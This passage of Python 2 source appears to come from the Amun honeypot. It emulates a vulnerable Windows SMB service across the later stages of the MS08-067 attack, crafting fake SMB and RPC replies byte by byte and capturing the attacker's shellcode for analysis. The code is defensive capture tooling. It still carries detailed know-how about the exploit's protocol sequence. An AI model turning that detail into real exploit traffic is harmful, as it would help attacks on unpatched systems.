				### word count
				self.reply[36] = "\x00"
				### byte count
				self.reply[37] = "\x00"
				self.reply[38] = "\x00"
				###

				resultSet['reply'] = "".join(self.reply[:39])
				self.stage = "MS08067_STAGE7"
				return resultSet
			elif self.stage == "MS08067_STAGE7" and bytes==96:
				print ".::[Amun - MS08-067 STAGE7] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
				#print ">> Request:"
				#self.print_message(message)
				resultSet["result"] = True
				resultSet["accept"] = True
				### netbios header
				self.reply[0] = "\x00"
				self.reply[1] = "\x00"
				self.reply[2] = "\x00"
				### size -4
				self.reply[3] = "\x89"
				### smb header
				self.reply[4] = "\xff"
				self.reply[5] = "\x53"
				self.reply[6] = "\x4d"
				self.reply[7] = "\x42"
				### command (dialect name)
				self.reply[8] = "\xa2"
				### error class
				self.reply[9] = "\x00"
				### reserved
				self.reply[10] = "\x00"
				### error code
				self.reply[11] = "\x00"
				self.reply[12] = "\x00"
				### flag
				self.reply[13] = "\x98"
				### flag2
				self.reply[14] = "\x01"
				self.reply[15] = "\x20"
				### extra
				self.reply[16] = "\x00"
				self.reply[17] = "\x00"
				self.reply[18] = "\x00"
				self.reply[19] = "\x00"
				self.reply[20] = "\x00"
				self.reply[21] = "\x00"
				self.reply[22] = "\x00"
				self.reply[23] = "\x00"
				self.reply[24] = "\x00"
				self.reply[25] = "\x00"
				self.reply[26] = "\x00"
				self.reply[27] = "\x00"
				### tree ID
				self.reply[28] = "\x00"
				self.reply[29] = "\x08"
				### pid
				self.reply[30] = message[30]
				self.reply[31] = message[31]
				### uid
				self.reply[32] = "\x01"
				self.reply[33] = "\x08"
				### mid
				self.reply[34] = message[34]
				self.reply[35] = message[35]
				### word count
				self.reply[36] = "\x2a"
				### andx command
				self.reply[37] = "\xff"
				### reserved
				self.reply[38] = "\x00"
				### andx offset
				self.reply[39] = "\x87"
				self.reply[40] = "\x00"
				### op lock level
				self.reply[41] = "\x00"
				### FID
				self.reply[42] = "\x00"
				self.reply[43] = "\x40"
				### create action
				self.reply[44] = "\x01"
				self.reply[45] = "\x00"
				self.reply[46] = "\x00"
				self.reply[47] = "\x00"
				### created
				self.reply[48] = "\x00"
				self.reply[49] = "\x00"
				self.reply[50] = "\x00"
				self.reply[51] = "\x00"
				self.reply[52] = "\x00"
				self.reply[53] = "\x00"
				self.reply[54] = "\x00"
				self.reply[55] = "\x00"
				### last access
				self.reply[56] = "\x00"
				self.reply[57] = "\x00"
				self.reply[58] = "\x00"
				self.reply[59] = "\x00"
				self.reply[60] = "\x00"
				self.reply[61] = "\x00"
				self.reply[62] = "\x00"
				self.reply[63] = "\x00"
				### last write
				self.reply[64] = "\x00"
				self.reply[65] = "\x00"
				self.reply[66] = "\x00"
				self.reply[67] = "\x00"
				self.reply[68] = "\x00"
				self.reply[69] = "\x00"
				self.reply[70] = "\x00"
				self.reply[71] = "\x00"
				### change
				self.reply[72] = "\x00"
				self.reply[73] = "\x00"
				self.reply[74] = "\x00"
				self.reply[75] = "\x00"
				self.reply[76] = "\x00"
				self.reply[77] = "\x00"
				self.reply[78] = "\x00"
				self.reply[79] = "\x00"
				### file attributes 
				self.reply[80] = "\x80"
				self.reply[81] = "\x00"
				self.reply[82] = "\x00"
				self.reply[83] = "\x00"
				### allocation size
				self.reply[84] = "\x00"
				self.reply[85] = "\x10"
				self.reply[86] = "\x00"
				self.reply[87] = "\x00"
				self.reply[88] = "\x00"
				self.reply[89] = "\x00"
				self.reply[90] = "\x00"
				self.reply[91] = "\x00"
				### end of file
				self.reply[92] = "\x00"
				self.reply[93] = "\x00"
				self.reply[94] = "\x00"
				self.reply[95] = "\x00"
				self.reply[96] = "\x00"
				self.reply[97] = "\x00"
				self.reply[98] = "\x00"
				self.reply[99] = "\x00"
				### file type
				self.reply[100] = "\x02"
				self.reply[101] = "\x00"
				### ipc state
				self.reply[102] = "\xff"
				self.reply[103] = "\x05"
				### directory
				self.reply[104] = "\x00"
				### byte count
				self.reply[105] = "\x00"
				self.reply[106] = "\x00"
				### fid
				self.reply[107] = "\x00"
				self.reply[108] = "\x00"
				self.reply[109] = "\x00"
				self.reply[110] = "\x00"
				self.reply[111] = "\x00"
				self.reply[112] = "\x00"
				self.reply[113] = "\x00"
				self.reply[114] = "\x00"
				self.reply[115] = "\x00"
				self.reply[116] = "\x00"
				self.reply[117] = "\x00"
				self.reply[118] = "\x00"
				self.reply[119] = "\x00"
				self.reply[120] = "\x00"
				self.reply[121] = "\x00"
				self.reply[122] = "\x00"
				self.reply[123] = "\x00"
				self.reply[124] = "\x00"
				self.reply[125] = "\x00"
				self.reply[126] = "\x00"
				self.reply[127] = "\x00"
				self.reply[128] = "\x00"
				self.reply[129] = "\x9b"
				self.reply[130] = "\x01"
				self.reply[131] = "\x12"
				self.reply[132] = "\x00"
				self.reply[133] = "\x9b"
				self.reply[134] = "\x01"
				self.reply[135] = "\x12"
				self.reply[136] = "\x00"
				self.reply[137] = "\x00"
				self.reply[138] = "\x00"
				###
				### create andx response FID
				resultSet['reply'] = "".join(self.reply[:139])
				self.stage = "MS08067_STAGE8"
				return resultSet
			elif self.stage == "MS08067_STAGE8" and bytes>0:
				print ".::[Amun - MS08-067 STAGE8] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
				#print ">> Request:"
				#self.print_message(message)
				resultSet["result"] = True
				resultSet["accept"] = True
				### netbios header
				self.reply[0] = "\x00"
				self.reply[1] = "\x00"
				self.reply[2] = "\x00"
				### size -4
				self.reply[3] = "\x31"
				### smb header
				self.reply[4] = "\xff"
				self.reply[5] = "\x53"
				self.reply[6] = "\x4d"
				self.reply[7] = "\x42"
				### command (dialect name)
				self.reply[8] = "\x2f"
				### error class
				self.reply[9] = "\x00"
				### reserved
				self.reply[10] = "\x00"
				### error code
				self.reply[11] = "\x00"
				self.reply[12] = "\x00"
				### flag
				self.reply[13] = "\x98"
				### flag2
				self.reply[14] = "\x01"
				self.reply[15] = "\x20"
				### extra
				self.reply[16] = "\x00"
				self.reply[17] = "\x00"
				self.reply[18] = "\x00"
				self.reply[19] = "\x00"
				self.reply[20] = "\x00"
				self.reply[21] = "\x00"
				self.reply[22] = "\x00"
				self.reply[23] = "\x00"
				self.reply[24] = "\x00"
				self.reply[25] = "\x00"
				self.reply[26] = "\x00"
				self.reply[27] = "\x00"
				### tree ID
				self.reply[28] = "\x00"
				self.reply[29] = "\x08"
				### pid
				self.reply[30] = message[30]
				self.reply[31] = message[31]
				### uid
				self.reply[32] = "\x01"
				self.reply[33] = "\x08"
				### mid
				self.reply[34] = message[34]
				self.reply[35] = message[35]
				### write andx response (word count)
				self.reply[36] = "\x06"
				### andx command
				self.reply[37] = "\xff"
				### reserved
				self.reply[38] = "\x00"
				### andx offset
				self.reply[39] = "\x2f"
				self.reply[40] = "\x00"
				### count low
				self.reply[41] = message[53]
				self.reply[42] = message[54]
				### remaining
				self.reply[43] = "\xff"
				self.reply[44] = "\xff"
				### count high
				self.reply[45] = "\x00"
				self.reply[46] = "\x00"
				### reserved
				self.reply[47] = "\x00"
				self.reply[48] = "\x00"
				### byte count
				self.reply[49] = "\x00"
				self.reply[50] = "\x00"
				###
				resultSet['reply'] = "".join(self.reply[:51])
				self.stage = "MS08067_STAGE9"
				return resultSet
			elif self.stage == "MS08067_STAGE9" and bytes>0:
				print ".::[Amun - MS08-067 STAGE9] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
				#print ">> Request:"
				#self.print_message(message)
				### read andx response
				resultSet["result"] = True
				resultSet["accept"] = True
				### netbios header
				self.reply[0] = "\x00"
				self.reply[1] = "\x00"
				self.reply[2] = "\x00"
				### size -4
				self.reply[3] = "\xd6"
				### smb header
				self.reply[4] = "\xff"
				self.reply[5] = "\x53"
				self.reply[6] = "\x4d"
				self.reply[7] = "\x42"
				### command (dialect name)
				self.reply[8] = "\x2e"
				### error class
				self.reply[9] = "\x05"
				### reserved
				self.reply[10] = "\x00"
				### error code
				self.reply[11] = "\x00"
				self.reply[12] = "\x80"
				### flag
				self.reply[13] = "\x98"
				### flag2
				self.reply[14] = "\x01"
				self.reply[15] = "\x60"
				### extra
				self.reply[16] = "\x00"
				self.reply[17] = "\x00"
				self.reply[18] = "\x00"
				self.reply[19] = "\x00"
				self.reply[20] = "\x00"
				self.reply[21] = "\x00"
				self.reply[22] = "\x00"
				self.reply[23] = "\x00"
				self.reply[24] = "\x00"
				self.reply[25] = "\x00"
				self.reply[26] = "\x00"
				self.reply[27] = "\x00"
				### tree ID
				self.reply[28] = "\x00"
				self.reply[29] = "\x08"
				### pid
				self.reply[30] = message[30]
				self.reply[31] = message[31]
				### uid
				self.reply[32] = "\x01"
				self.reply[33] = "\x08"
				### mid
				self.reply[34] = message[34]
				self.reply[35] = message[35]
				### word count
				self.reply[36] = "\x0c"
				### andx command
				self.reply[37] = "\xff"
				### reserved
				self.reply[38] = "\x00"
				### andx offset
				self.reply[39] = "\x00"
				self.reply[40] = "\x00"
				### remaining
				self.reply[41] = "\x00"
				self.reply[42] = "\x00"
				### data compaction mode
				self.reply[43] = "\x00"
				self.reply[44] = "\x00"
				### reserved
				self.reply[45] = "\x00"
				self.reply[46] = "\x00"
				### data length low
				self.reply[47] = message[47]
				self.reply[48] = message[48]
				### data offset
				self.reply[49] = "\x3c"
				self.reply[50] = "\x00"
				### data length high
				self.reply[51] = "\x00"
				self.reply[52] = "\x00"
				self.reply[53] = "\x00"
				self.reply[54] = "\x00"
				### reserved
				self.reply[55] = "\x00"
				self.reply[56] = "\x00"
				self.reply[57] = "\x00"
				self.reply[58] = "\x00"
				self.reply[59] = "\x00"
				self.reply[60] = "\x00"
				### byte count
				self.reply[61] = "\x98"
				self.reply[62] = "\x00"
				### padding
				self.reply[63] = "\x00"
				###
				self.reply[64:216] = "\x05\x00\x0c\x03\x10\x00\x00\x00|\x01\x00\x00\x00\x00\x00\x00\xb8\x10\xb8\x10\xdda\x00\x00\x0e\x00\\PIPE\\browser\x00\x0e\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00"
				###
				resultSet['reply'] = "".join(self.reply[:216])
				self.stage = "MS08067_STAGE10"
				return resultSet
			elif self.stage == "MS08067_STAGE10" and bytes>0:
				print ".::[Amun - MS08-067 STAGE10] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
				print ">> Request:"
				self.print_message(message)
				resultSet["result"] = False
				resultSet["accept"] = True
				### netbios header
				self.reply[0] = "\x00"
				self.reply[1] = "\x00"
				self.reply[2] = "\x01"
				### size -4
				self.reply[3] = "\x24"
				### smb header
				self.reply[4] = "\xff"
				self.reply[5] = "\x53"
				self.reply[6] = "\x4d"
				self.reply[7] = "\x42"
				### command (dialect name)
				self.reply[8] = "\x2e"
				### error class
				self.reply[9] = "\x00"
				### reserved
				self.reply[10] = "\x00"
				### error code
				self.reply[11] = "\x00"
				self.reply[12] = "\x00"
				### flag
				self.reply[13] = "\x98"
				### flag2
				self.reply[14] = "\x01"
				self.reply[15] = "\x20"
				### extra
				self.reply[16] = "\x00"
				self.reply[17] = "\x00"
				self.reply[18] = "\x00"
				self.reply[19] = "\x00"
				self.reply[20] = "\x00"
				self.reply[21] = "\x00"
				self.reply[22] = "\x00"
				self.reply[23] = "\x00"
				self.reply[24] = "\x00"
				self.reply[25] = "\x00"
				self.reply[26] = "\x00"
				self.reply[27] = "\x00"
				### tree ID
				self.reply[28] = "\x00"
				self.reply[29] = "\x08"
				### pid
				self.reply[30] = message[30]
				self.reply[31] = message[31]
				### uid
				self.reply[32] = "\xa1"
				self.reply[33] = "\xa1"
				### mid
				self.reply[34] = message[34]
				self.reply[35] = message[35]
				### word count
				self.reply[36] = "\x0c"
				### andx command
				self.reply[37] = "\xff"
				### reserved
				self.reply[38] = "\x00"
				### andx offset
				self.reply[39] = "\x00"
				self.reply[40] = "\x00"
				### remaining
				self.reply[41] = "\x00"
				self.reply[42] = "\x00"
				### data compaction mode
				self.reply[43] = "\x00"
				self.reply[44] = "\x00"
				### reserved
				self.reply[45] = "\x00"
				self.reply[46] = "\x00"
				### data length low 
				self.reply[47] = "\xe5"
				self.reply[48] = "\x00"
				### data offset
				self.reply[49] = "\x3c"
				self.reply[50] = "\x00"
				### data length high
				self.reply[51] = "\x00"
				self.reply[52] = "\x00"
				self.reply[53] = "\x00"
				self.reply[54] = "\x00"
				### reserved
				self.reply[55] = "\x00"
				self.reply[56] = "\x00"
				self.reply[57] = "\x00"
				self.reply[58] = "\x00"
				self.reply[59] = "\x00"
				self.reply[60] = "\x00"
				### byte count
				self.reply[61] = "\xe6"
				self.reply[62] = "\x00"
				### padding
				self.reply[63] = "\x00"
				### data
				self.reply[64:294] = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00"
				###

				resultSet["shellcode"] = "".join(self.shellcode)
				resultSet['reply'] = "".join(self.reply[:294])
				self.stage = "MS08067_STAGE9"
				return resultSet
			elif self.stage == "SHELLCODE":
				if bytes>0:
					#print ".::[Amun - Analyzer] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
					resultSet["result"] = True
					resultSet["accept"] = True
					resultSet['reply'] = "".join(self.reply)
					self.shellcode.append(message)
					self.stage = "SHELLCODE"
					#resultSet["shellcode"] = "".join(self.shellcode)
					return resultSet
				else:
					#print ".::[Amun - Analyzer] finish collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
					resultSet["result"] = False
					resultSet["accept"] = True
					resultSet["reply"] = "None"
					self.shellcode.append(message)
					resultSet["shellcode"] = "".join(self.shellcode)
					return resultSet
			else:
				resultSet["result"] = False
				resultSet["accept"] = False
				resultSet["reply"] = "None"
				return resultSet
			return resultSet
		except KeyboardInterrupt:
			raise
		except StandardError, e:
			print e
		except:
			print "Analyzer fatal error"
